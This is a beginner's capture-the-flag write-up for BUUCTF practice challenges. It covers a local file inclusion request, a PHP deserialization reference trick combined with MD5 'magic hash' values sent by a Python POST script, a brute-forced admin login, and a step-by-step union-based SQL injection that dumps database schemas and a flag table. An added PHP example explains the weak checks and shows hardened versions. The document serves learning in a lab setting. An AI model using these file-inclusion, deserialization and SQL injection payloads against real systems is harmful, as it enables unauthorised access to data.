BUUCTF Beginner Write-up Notes: Basic Section

Contents

  • Linux Lab
  • BUU LFI COURSE 1
  • Upload-Labs-Linux
  • BUU CODE REVIEW 1
  • BUU BRUTE 1
  • sqli-labs
    • Less-1
  • To be continued...

Linux Lab

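# The address and port are examples; change them to the dynamically assigned address and port
ssh [email protected] -p 233
# Enter the default password 123456
cat /flag.txt
# Outputs the flag:
# flag{ef2a6029-xxxx-xxxx-xxxx-86fb808b12f2}
# At first I thought only the content inside the braces was needed... but it turned out the submission has to include "flag" and the braces.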

BUU LFI COURSE 1

Visit the given address and append ?file=/flag to the end of the URL, for example http://e62a5eef-xxxx-xxxx-xxxx-3a705b9cd797.node2333.buuoj.cn/?file=/flag, to get the result.

Upload-Labs-Linux

This one looks fairly complicated, so I'll leave it for now...

BUU CODE REVIEW 1

First, go to http://c.runoob.com/compile/1 and run the following code


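<?php
class BUU {
	public $correct="";
	public $input="";
}
$obj = new BUU();
// Assign by reference (&) so that serialize() emits R:2 for input;
// a plain copy would serialize input as s:0:"" instead.
$obj->input = &$obj->correct;
echo serialize($obj);
?>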

This gives a result similar to the following

O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}

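Next, run the following Python script (change the url first, but do not delete the ?pleaseget=1 part), then open the generated html file in a browser to see the flag (a tool such as Postman also works)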

#!/usr/bin/env python
import requests

with requests.post(url="http://c934396b-xxxx-xxxx-xxxx-62bbeee14c98.node3.buuoj.cn/?pleaseget=1",
                   data={
                       "pleasepost": "2",
                       "md51": "QNKCDZO",
                       "md52": "240610708",
                       "obj": """O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}"""
                   }
                   ) as req:
    print(req.text)
    with open("BUU CODE REVIEW 1.html", "w", encoding=req.apparent_encoding) as f:
        f.write(req.text)
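
Why the submitted values pass, as an added example that is not part of the original post or the challenge's own code: `QNKCDZO` and `240610708` both hash to MD5 digests of the form `0e<digits>`, and `R:2` makes `input` a reference to `correct`. The check functions are assumptions, since the post does not show the challenge source; each weak form sits beside a stricter one.

```php
<?php
// Added example. The challenge source is not shown in the post, so the
// checks below are assumed (hypothetical) forms of what the server tests.

// Weak: loose == on hex digests. Two digests that both look like
// "0e<digits>" are numeric strings, so PHP compares them as floats (0 == 0).
function weak_md5_check(string $a, string $b): bool {
    return $a != $b && md5($a) == md5($b);
}

// Hardened: compare the digests as strings, in constant time.
function strict_md5_check(string $a, string $b): bool {
    return $a !== $b && hash_equals(md5($a), md5($b));
}

class BUU {
    public $correct = "";
    public $input = "";
}

// Assumed server-side step: a fresh secret is written to $correct after
// unserialize(), then compared strictly with $input.
function secret_matches(object $obj): bool {
    $obj->correct = base64_encode(random_bytes(8));
    return $obj->correct === $obj->input;
}

// Serialized object taken from the post.
$payload = 'O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}';

// Print both digests, then the verdict of each comparison on the pair.
var_dump(md5("QNKCDZO"), md5("240610708"));
var_dump(weak_md5_check("QNKCDZO", "240610708"));
var_dump(strict_md5_check("QNKCDZO", "240610708"));

// R:2 binds input to the same value slot as correct, so the later write
// to correct is visible through input and even === cannot tell them apart.
var_dump(secret_matches(unserialize($payload)));

// Hardened: refuse to instantiate classes from untrusted input. The result
// is a __PHP_Incomplete_Class, so no BUU method (such as a destructor) runs.
$safe = unserialize($payload, ['allowed_classes' => false]);
var_dump($safe instanceof BUU);
```

Passing structured data as JSON instead of `unserialize()` removes the reference trick entirely, because JSON has no notion of references or classes.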

BUU BRUTE 1

Username	admin
Password	6490
This gives the flag.

sqli-labs

Less-1

  1. Reference link
  2. ?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
  3. ?id=0' union select 1,2,group_concat(schema_name) from information_schema.schemata--+
Your Login name:2
Your Password:challenges,ctftraining,information_schema,mysql,performance_schema,security,test
  4. ?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctftraining'--+
Your Login name:2
Your Password:flag,news,users
  5. ?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='ctftraining' and table_name='flag'--+
Your Login name:2
Your Password:flag
  6. ?id=0' union select 1,2,group_concat(flag) from ctftraining.flag--+
Your Login name:2
Your Password:flag{6ede70a6-xxxx-xxxx-xxxx-169b7d270d99}

To be continued...
